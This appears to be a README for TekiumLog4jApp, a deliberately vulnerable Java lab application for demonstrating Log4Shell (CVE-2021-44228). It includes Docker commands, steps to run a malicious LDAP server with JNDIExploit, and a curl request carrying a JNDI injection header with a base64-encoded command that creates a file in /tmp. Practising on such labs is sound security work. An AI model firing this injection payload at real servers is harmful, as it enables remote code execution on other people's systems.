Share
## https://sploitus.com/exploit?id=254068B4-97B4-5DCF-A60F-5206B6DD230E
# TekiumLog4jApp v1.0

Author: Erick Rodríguez 

Email: erickrr.tbd93@gmail.com, erodriguez@tekium.mx

License: GPLv3

Application developed in Java that simulates an application vulnerable to CVE-2021-44228. 

It uses Log4j 2.11.1 and JDK 1.8.0_181.

![TekiumLog4jApp](https://github.com/erickrr-bd/TekiumLog4jApp/blob/master/screens/screen.jpg)

# Running

Run it:

`docker run --name tekiumlog4japp -p 8080:8080 d0ck3rt3k1umhub/tekiumlog4japp:v1`

Build the Docker image by yourself:

`docker build . -t tekiumlog4japp`

`docker run -p 8080:8080 --name tekiumlog4japp tekiumlog4japp`

# Exploitation Steps

<i>Note: This project is inspired by the <a href="https://github.com/christophetd/log4shell-vulnerable-app">christophetd</a> project.</i>

JNDIExploit.v1.2.zip is included in the repository as it was apparently removed from Github.

- Use <a href="https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip">JNDIExploit</a> to spin up a malicious LDAP server

`unzip JNDIExploit.v1.2.zip`

`java -jar JNDIExploit-1.2-SNAPSHOT.jar -i your-private-ip -p 8888`

- Then, trigger the exploit using:

`curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://your-private-ip:1389/Basic/Command/Base64/dG91Y2ggL3RtcC90ZWtpdW1fcHJ1ZWJhLnR4dA==}'`

- Notice the output of JNDIExploit, showing it has sent a malicious LDAP response and served the second-stage payload:

![TekiumLog4jApp](https://github.com/erickrr-bd/TekiumLog4jApp/blob/master/screens/response.jpg)

- To confirm that the code execution was successful, notice that the file /tmp/tekium_prueba.txt was created in the container running the vulnerable application:

`docker exec tekiumlog4japp ls /tmp`

# Commercial Support
![Tekium](https://github.com/unmanarc/uAuditAnalyzer2/blob/master/art/tekium_slogo.jpeg)

Tekium is a cybersecurity company specialized in red team and blue team activities based in Mexico, it has clients in the financial, telecom and retail sectors.

Tekium is an active sponsor of the project, and provides commercial support in the case you need it.

For integration with other platforms such as the Elastic stack, SIEMs, managed security providers in-house solutions, or for any other requests for extending current functionality that you wish to see included in future versions, please contact us: info at tekium.mx

For more information, go to: https://www.tekium.mx/